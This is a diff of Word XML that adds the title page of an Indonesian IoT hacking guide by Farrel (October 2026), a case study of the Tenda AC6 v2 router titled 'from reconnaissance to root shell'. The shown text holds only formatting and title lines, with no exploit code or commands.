 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:body>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="1440"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="555555"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>STUDI KASUS KEAMANAN PERANGKAT IOT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="7A0D0D"/>
+          <w:sz w:val="64"/>
+        </w:rPr>
+        <w:t>Belajar Hardware, Firmware &amp; IoT Hacking</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="32"/>
+        </w:rPr>
+        <w:t>Dari Reconnaissance sampai Root Shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="960"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="555555"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Studi Kasus: Router Tenda AC6 v2 — Emulasi Terisolasi &amp; Eksploitasi Nyata</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Farrel</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="555555"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Oktober 2026  •  Edisi 1.0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p>
       <w:pPr>
